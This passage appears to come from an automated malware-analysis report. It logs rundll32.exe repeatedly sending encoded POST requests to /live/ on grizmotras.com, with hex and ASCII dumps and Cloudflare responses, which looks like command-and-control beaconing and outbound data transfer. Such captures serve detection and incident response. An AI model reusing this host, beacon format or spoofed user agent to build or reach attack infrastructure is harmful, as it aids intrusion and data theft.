                                                                                                Data Ascii: YjOeEyiMk3RvE5vcC/HWCbEd2NSiCzBvkB27+tXTLWmAUbmKni5eydH76c544w3dA5mBWLUUfs9FloPMfPu+9sL8KXzJchOQ6zFrHlvIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=
                                                                                                2024-04-26 21:17:28 UTC572INHTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:17:28 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1neCgo496T532%2FvSRcsH9ULNapYeI3YRsZ8DTsSqy5bt94YDdXTXh3lQ7rXXqA1EyiqQT0Oa4tCZnn38jMYygiVvzzkUyXU1vccQVy0lTKeX5xHfLCJBAtIpwOX3xXlODw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a999733e6467e7-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:17:28 UTC118INData Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:17:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                28192.168.2.549751172.67.219.28443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:17:28 UTC228OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 1116
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:17:28 UTC1116OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 75 45 35 76 63 43 2f 48 57 43 71 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57 44 35 41 76 78 42 68 66 69 30 33 47 79 76 50 62 39 38 61 71 69 2f 39 6c 4f 2b 64 77 73 38 62 6c 68 70 37 77 6a 73 30 6e 37 34 4b 36 6f 2b 36 69 45 4a 4f 62 4c 71 55 43 46 72 71 57 45 35 33 74 46 54 67 51 52 4f 71 75 59 76 66
                                                                                                Data Ascii: YjOeEyiMk3RuE5vcC/HWCqZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuWD5AvxBhfi03GyvPb98aqi/9lO+dws8blhp7wjs0n74K6o+6iEJObLqUCFrqWE53tFTgQROquYvf
                                                                                                2024-04-26 21:17:31 UTC572INHTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:17:30 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Dq86jx3AONZO8FTpoNoUTi4bUnSG97KESbgK1R1HWENVJMGY2tvDaDK14mcfCErvdmmyP5gtWp1JJUsC%2FPx0QolA119J0VTKfc0wtZ1rAmaqq57tzIOfk34zLkBHrnr8Ug%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a999908f9d498e-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:17:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                29192.168.2.549752172.67.219.28443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:17:31 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:17:31 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 74 45 35 76 63 43 2f 48 57 43 62 45 64 32 4e 53 69 43 7a 42 76 6b 42 32 37 2b 74 58 54 4c 57 6d 41 55 62 6d 4b 6e 69 35 65 79 64 48 37 36 63 35 34 34 77 33 64 41 35 6d 42 57 4c 55 55 66 73 39 46 6c 6f 50 4d 66 50 75 2b 39 73 4c 38 4b 58 7a 4a 63 68 4f 51 36 7a 46 72 48 6c 76 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d
                                                                                                Data Ascii: YjOeEyiMk3RtE5vcC/HWCbEd2NSiCzBvkB27+tXTLWmAUbmKni5eydH76c544w3dA5mBWLUUfs9FloPMfPu+9sL8KXzJchOQ6zFrHlvIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=
                                                                                                2024-04-26 21:17:37 UTC576INHTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:17:37 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0mNCnjEzqh9jJBqsHfNliWP75%2BbGFBHHRVl9PjZs83alpGFkR6b3JrY4IMzu4z8kwvkYd2T4y2z73OosLdCBxi0MXw%2FsbwXx%2FDNCAQomcGKGD2y8EqpCbKiaKC27XY1QIg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a999a0ef1674ca-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:17:37 UTC118INData Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:17:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                30192.168.2.549753172.67.219.28443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:17:37 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:17:37 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 73 45 35 76 63 43 2f 48 57 43 62 45 64 32 4e 53 69 43 7a 42 76 6b 42 32 37 2b 74 58 54 4c 57 6d 41 55 62 6d 4b 6e 69 35 65 79 64 48 37 36 63 35 34 34 77 33 64 41 35 6d 42 57 4c 55 55 66 73 39 46 6c 6f 50 4d 66 50 75 2b 39 73 4c 38 4b 58 7a 4a 63 68 4f 51 36 7a 46 72 48 6c 76 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d
                                                                                                Data Ascii: YjOeEyiMk3RsE5vcC/HWCbEd2NSiCzBvkB27+tXTLWmAUbmKni5eydH76c544w3dA5mBWLUUfs9FloPMfPu+9sL8KXzJchOQ6zFrHlvIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=
                                                                                                2024-04-26 21:17:42 UTC584INHTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:17:42 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Moto%2FHakBGR9PYwRxxVnnkFJq59rz%2B5X%2FoTTQ2ND9b8%2Bbzjw%2BpZATZ8fXSSpzet5F6RO1u8d04vG0PQwmxHWrB2PU0ze1eMae%2FdqEKwA%2Bc5e0PfnEjLa8IX65KIxX6ZvgA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a999c7be254c27-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:17:42 UTC118INData Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:17:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                31192.168.2.549754172.67.219.28443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:17:43 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:17:43 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6a 45 35 76 63 43 2f 48 57 43 62 45 64 32 4e 53 69 43 7a 42 76 6b 42 32 37 2b 74 58 54 4c 57 6d 41 55 62 6d 4b 6e 69 35 65 79 64 48 37 36 63 35 34 34 77 33 64 41 35 6d 42 57 4c 55 55 66 73 39 46 6c 6f 50 4d 66 50 75 2b 39 73 4c 38 4b 58 7a 4a 63 68 4f 51 36 7a 46 72 48 6c 76 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d
                                                                                                Data Ascii: YjOeEyiMk3RjE5vcC/HWCbEd2NSiCzBvkB27+tXTLWmAUbmKni5eydH76c544w3dA5mBWLUUfs9FloPMfPu+9sL8KXzJchOQ6zFrHlvIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=
                                                                                                2024-04-26 21:17:47 UTC580INHTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:17:47 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B7IK5vx%2BJkiGgybszpPe67upNO%2BJGVqpHK3G%2FJl5yT3dvtUIL6c9jlvZUpEe8DMUN%2Fdi%2FOSYucbDp225XY0xvoy8InLXUpJ0SnbD4wNIcTTKIwZOEFU4bFJuFyiU30wAbg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a999ea2cd16db9-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:17:47 UTC118INData Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:17:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                32192.168.2.549755172.67.219.28443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:17:47 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:17:47 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 69 45 35 76 63 43 2f 48 57 43 62 45 64 32 4e 53 69 43 7a 42 76 6b 42 32 37 2b 74 58 54 4c 57 6d 41 55 62 6d 4b 6e 69 35 65 79 64 48 37 36 63 35 34 34 77 33 64 41 35 6d 42 57 4c 55 55 66 73 39 46 6c 6f 50 4d 66 50 75 2b 39 73 4c 38 4b 58 7a 4a 63 68 4f 51 36 7a 46 72 48 6c 76 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d
                                                                                                Data Ascii: YjOeEyiMk3RiE5vcC/HWCbEd2NSiCzBvkB27+tXTLWmAUbmKni5eydH76c544w3dA5mBWLUUfs9FloPMfPu+9sL8KXzJchOQ6zFrHlvIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=
                                                                                                2024-04-26 21:17:51 UTC572INHTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:17:51 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2o4enqXMjlTB3y0RGt7VBEDeiXczN4xgoFnnAqp6bGKlptVoNrr9GMfo0wdjZ2jZjKbArSQFi2vvB9igoIbuR6CgzH%2BpsZx66adDoQVRUMS8s49gRtljendbw3JQwfmvPQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99a057a5d8759-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:17:51 UTC118INData Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:17:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                33192.168.2.549756172.67.219.28443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:17:51 UTC229OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 12780
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:17:51 UTC12780OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 71 42 63 6e 52 41 75 53 4f 42 61 52 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57 44 34 6f 72 7a 68 74 64 69 46 61 63 6b 73 37 41 37 76 71 63 73 4c 6c 55 47 70 30 69 67 4f 53 52 67 71 7a 51 69 76 6f 65 33 71 36 5a 6e 76 44 59 64 71 4f 47 4e 34 41 39 48 73 57 58 45 72 54 50 45 54 6f 33 4e 2b 57 4b 58 38 4f
                                                                                                Data Ascii: YjOeEyiMk3RqBcnRAuSOBaRcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuWD4orzhtdiFacks7A7vqcsLlUGp0igOSRgqzQivoe3q6ZnvDYdqOGN4A9HsWXErTPETo3N+WKX8O
                                                                                                2024-04-26 21:18:01 UTC578INHTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:18:01 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xpw8s%2F2wz720PZ8%2FIsb5Qln%2BR4u9faMI3NwT1DPjazeK6mj1rLUeSyIi7D2FvJkOYtmYV0zSc3DbMZXfoUE6I6XLIcP3Np8XXeEhcGwHVjGpOFSRpKhJo46M%2BlvHHBsthg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99a1cc89e5c69-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:18:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                34192.168.2.549757172.67.219.28443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:18:01 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:18:01 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 71 42 4d 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RqBMnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW
                                                                                                2024-04-26 21:18:05 UTC576INHTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:18:05 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gDEqxSctneib%2FOFviRJUjtHLz9RjSfEAoKnr5PqT7cIUo7JIX6YFMWkO%2BlQILICUt5qFh7cGCeyBwNGVKBXl45JlxU19Dsq0JU2P3BX7T2%2BADnVma1mOzlC8rcYgfzSCQg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99a5cddea741d-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:18:05 UTC118INData Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:18:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                35192.168.2.549758172.67.219.28443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:18:05 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:18:05 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 71 42 38 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RqB8nRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW
                                                                                                2024-04-26 21:18:13 UTC578INHTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:18:13 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a%2BMMJrfgbCMZNCtreyhPYzJBfd1js6JTaJqT7Ml%2FjWIJsmjfxqYAHriodr4HC5GIueHPyRA7xtqBqCaaBaGyrrZsTiSdgoyUFnZwC%2FdQ684Z1taUBV3dxQTM%2FypkMaxwzQ%3D%3D"}],"group":"cf-nel","max_age":604800}
